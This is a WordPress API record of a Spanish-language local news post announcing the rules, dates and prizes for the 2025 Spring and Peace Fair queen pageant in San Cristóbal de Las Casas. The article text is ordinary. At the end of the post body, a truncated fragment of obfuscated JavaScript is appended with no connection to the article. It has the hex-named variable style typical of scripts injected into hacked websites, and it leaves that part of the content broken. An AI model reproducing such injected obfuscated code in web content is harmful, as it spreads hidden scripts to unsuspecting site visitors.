{"id":20796,"date":"2025-03-07T06:04:16","date_gmt":"2025-03-07T06:04:16","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20796"},"modified":"2025-03-07T06:04:17","modified_gmt":"2025-03-07T06:04:17","slug":"convocan-a-la-eleccion-de-la-reina-de-la-feria-de-la-primavera-y-de-la-paz-2025-en-san-cristobal-delas-casas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20796","title":{"rendered":"Convocan a la Elecci\u00f3n de la Reina de la Feria de la Primavera y de la Paz 2025 en San Crist\u00f3bal deLas Casas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250306-WA0026-1024x682.jpg\" alt=\"\" class=\"wp-image-20797\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250306-WA0026-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250306-WA0026-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250306-WA0026-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250306-WA0026-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250306-WA0026-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250306-WA0026.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas, 06 de marzo de 2025.- El Honorable Ayuntamiento Municipal Constitucional 2024-2027, que preside la Mtra. Fabiola Ricci Diestel, emiti\u00f3 la convocatoria oficial para la elecci\u00f3n de la Reina de la Feria de la Primavera y de la Paz 2025, un evento emblem\u00e1tico que busca resaltar la belleza, cultura y tradiciones de la ciudad.<\/p>\n\n\n\n<p>La convocatoria fue dada a conocer durante la sesi\u00f3n p\u00fablica de cabildo, donde se hizo la invitaci\u00f3n abierta a todas las colonias y barrios del municipio, los cuales podr\u00e1n elegir a su representante mediante un proceso libre y democr\u00e1tico. Se busca contar con una participante de cada zona geogr\u00e1fica de la ciudad, as\u00ed como de la zona rural.<br>De acuerdo con las bases dadas a conocer, las aspirantes deber\u00e1n cumplir con requisitos como ser originarias de San Crist\u00f3bal de Las Casas y tener entre 18 y 25 a\u00f1os, presentando acta de nacimiento, comprobante de domicilio, fotograf\u00eda reciente y semblanza personal, adem\u00e1s de estar inscritas en una instituci\u00f3n educativa y contar con constancia de estudios vigente.<\/p>\n\n\n\n<p>Adem\u00e1s, deben tener vocaci\u00f3n de servicio y amor por las costumbres y tradiciones de la ciudad, conocer la historia del municipio y estar dispuestas a participar en eventos culturales y tur\u00edsticos, disponer de tiempo para ensayos y actividades relacionadas con el certamen, y respetar las decisiones del jurado calificador y los organizadores.<\/p>\n\n\n\n<p>Cada candidata deber\u00e1 ser inscrita por el presidente del Comit\u00e9 de Participaci\u00f3n y Colaboraci\u00f3n Vecinal de su barrio o colonia, quien certificar\u00e1 su representaci\u00f3n.<\/p>\n\n\n\n<p>Las inscripciones estar\u00e1n abiertas hasta el viernes 21 de marzo, en las oficinas de la Direcci\u00f3n de Cultura y Recreaci\u00f3n Municipal, ubicadas en el Centro Cultural \u201cEl Carmen\u201d, en un horario de 9:00 a 16:00 horas.<br>El certamen de elecci\u00f3n se llevar\u00e1 a cabo el s\u00e1bado 29 de marzo a las 18:00 horas, en el Parque de los H\u00e9roes, dentro del Museo de San Crist\u00f3bal (MUSAC).<\/p>\n\n\n\n<p>Las participantes ser\u00e1n evaluadas en tres etapas: Personalidad \u2013 Presentaci\u00f3n personal con ropa casual; Cultura \u2013 Exposici\u00f3n sobre la historia y tradiciones del barrio o colonia representada, vistiendo traje tradicional; y Belleza \u2013 Pasarela en vestido de noche.<\/p>\n\n\n\n<p>Un jurado conformado por figuras destacadas de la ciudad determinar\u00e1 a la ganadora, cuyo fallo ser\u00e1 inapelable.<\/p>\n\n\n\n<p>La premiaci\u00f3n ser\u00e1 su coronaci\u00f3n como Reina de la Feria de la Primavera y de la Paz 2025 y representar\u00e1 a San Crist\u00f3bal de Las Casas en diversos eventos. Contar\u00e1 con apoyo para su vestuario, maquillaje y peinado, adem\u00e1s de encabezar el desfile en un carro aleg\u00f3rico designado.<\/p>\n\n\n\n<p>La concursante que obtenga el segundo lugar ser\u00e1 nombrada Reina del DIF Municipal 2025 y recibir\u00e1 apoyo del Sistema para el Desarrollo Integral de la Familia (DIF) para su participaci\u00f3n en la feria.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. San Crist\u00f3bal de Las Casas, 06 de marzo de 2025.- El Honorable Ayuntamiento Municipal Constitucional 2024-2027, que preside la Mtra. Fabiola Ricci Diestel, emiti\u00f3 la convocatoria oficial para la elecci\u00f3n de la Reina de la Feria de la Primavera y de la Paz 2025, un evento emblem\u00e1tico que busca resaltar la belleza, cultura y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20797,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-20796","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20796","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20796"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20796\/revisions"}],"predecessor-version":[{"id":20798,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20796\/revisions\/20798"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20797"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20796"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20796"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20796"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}